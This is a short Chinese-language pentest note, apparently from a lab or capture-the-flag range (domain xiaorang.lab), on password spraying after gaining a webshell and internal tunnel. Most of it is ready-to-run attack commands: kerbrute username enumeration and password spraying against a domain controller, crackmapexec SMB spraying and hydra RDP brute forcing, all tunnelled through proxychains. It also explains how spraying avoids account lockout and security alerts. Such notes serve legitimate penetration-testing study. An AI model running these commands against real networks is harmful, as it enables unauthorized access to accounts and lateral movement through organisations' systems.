密码喷洒

在获取到 webshell 打通内网隧道后，可以通过收集的大量账号和密码，在 shell 的机器上对某一类系统进行密码喷洒

密码喷洒攻击属于一种自动化攻击的方式，为了避免只针对一个用户进行密码爆破而造成账户锁定，密码喷洒攻击是对大量账号进行爆破，避免安全告警。同时，不同于固定用户名对密码进行爆破，密码喷洒攻击是固定密码对用户名进行爆破

喷洒协议：一般对 SSH、RDP、SMB 协议进行爆破

攻击方式

kerbrute

爆破有效用户名

proxychains4 ./kerbrute_linux_amd64 userenum --dc 172.22.9.7 -d xiaorang.lab user.txt

# --dc：指定域控 ip
# -d：指定域名
# user.txt：用户名列表

有效用户名与单个密码进行喷洒

1
2

proxychains4 ./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt i9XDE02pLVf
proxychains4 ./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt 6N70jt2K9sV

crackmapexec

通过 SMB 进行密码喷洒

1	proxychains4 crackmapexec smb 172.22.9.26 -u user.txt -p pass.txt --continue-on-success

hydra

通过 RDP 进行密码喷洒

1	proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp